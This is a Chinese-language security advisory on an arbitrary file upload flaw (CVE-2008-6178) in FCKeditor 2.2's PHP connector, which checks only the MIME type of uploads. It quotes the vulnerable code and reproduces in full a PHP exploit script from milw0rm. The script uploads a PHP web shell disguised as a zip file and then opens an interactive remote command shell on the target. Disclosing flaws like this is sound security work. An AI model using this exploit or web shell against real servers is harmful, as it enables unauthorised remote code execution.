安全研究

安全漏洞
FCKeditor connector.php任意文件上传漏洞

发布日期:2008-10-18
更新日期:2009-02-20

受影响系统:
FCKeditor FCKeditor 2.2
描述:
BUGTRAQ  ID: 31812
CVE(CAN) ID: CVE-2008-6178

FCKeditor是一款开放源码的HTML文本编辑器。

FCKeditor的editor/filemanager/browser/default/connectors/php/connector.php模块中存在文件上传限制漏洞:

    147.    function FileUpload( $resourceType, $currentFolder )
    148.    {
    149.        $sErrorNumber = '0' ;
    150.        $sFileName = '' ;
    151.    
    152.        if ( isset( $_FILES['NewFile'] ) && !is_null( $_FILES['NewFile']['tmp_name'] ) )
    153.        {
    154.            $oFile = $_FILES['NewFile'] ;
    155.    
    156.            // Map the virtual path to the local server path.
    157.            $sServerDir = ServerMapFolder( $resourceType, $currentFolder ) ;
    158.    
    159.            // Get the uploaded file name.
    160.            $sFileName = $oFile['name'] ;
    161.            $sOriginalFileName = $sFileName ;
    162.            // Security fix by truzone 01-15-2006
    163.            //$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
    164.            //$sExtension = strtolower( $sExtension ) ;
    165.    
    166.            if(extension_loaded("mime_magic")){
    167.            $sExtension = mime_content_type($oFile['tmp_name']);
    168.            }else{
    169.            $sExtension = $oFile['type'];
    170.            }
    171.            // en of security fix by truzone 01-15-2006
    172.            global $Config ;
    173.    
    174.            $arAllowed    = $Config['AllowedExtensions'][$resourceType] ;
    175.            $arDenied    = $Config['DeniedExtensions'][$resourceType] ;

由于166-170行仅检查了MIME类型的上传请求,因此远程攻击者可以通过pht扩展名向Web服务器上传恶意脚本。

<*来源:EgiX (n0b0d13s@gmail.com
  
  链接:http://secunia.com/advisories/33973/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?
################################################################
#
# Falt4 CMS (fckeditor) Arbitrary File Upload Exploit
#
# Bug Discovered By : Sp3shial
#
# Sp3shial@ymail.com
#
# Persian Boys Hacking Team From A Land With A History-Long Background
#
# Download CMS : http://downloads.sourceforge.net/falt4/falt4extreme.zip?modtime=1196845455&big_mirror=0
#
###############################################################

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

function http_send($host, $packet)
{
    $sock = fsockopen($host, 80);
    while (!$sock)
    {
        print "\n[-] No response from {$host}:80 Trying again...";
        $sock = fsockopen($host, 80);
    }
    fputs($sock, $packet);
    while (!feof($sock)) $resp .= fread($sock, 1024);
    fclose($sock);
    return $resp;
}

function connector_response($html)
{
    return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}

print "\n+------------------------------------------------------------------+";
print "\n| Falt4 CMS (fckeditor) Arbitrary File Upload Exploit by Sp3shial  |";
print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)
{
    print "\nUsage......: php $argv[0] host path";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /Falt4/\n";
    die();
}

$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename  = md5(time()).".php";
$connector = "modules/newsletter/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php";

$payload  = "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: application/zip\r\n\r\n";
$payload .= "PK\003\004<?php error_reporting(0);print(\"_code_\\n\");passthru(base64_decode(\$_SERVER[HTTP_CMD])); ?>\n";
$payload .= "--o0oOo0o--\r\n";

$packet     = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet    .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";

$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root

$packet  = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

while(1)
{
    print "\nFalt4-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit")
    {
        $response = http_send($host, sprintf($packet, base64_encode($cmd)));
        preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
    }
    else break;
}

?>

http://www.milw0rm.com/exploits/6783

建议:
厂商补丁:

FCKeditor
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.fckeditor.net/

浏览次数:4939
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客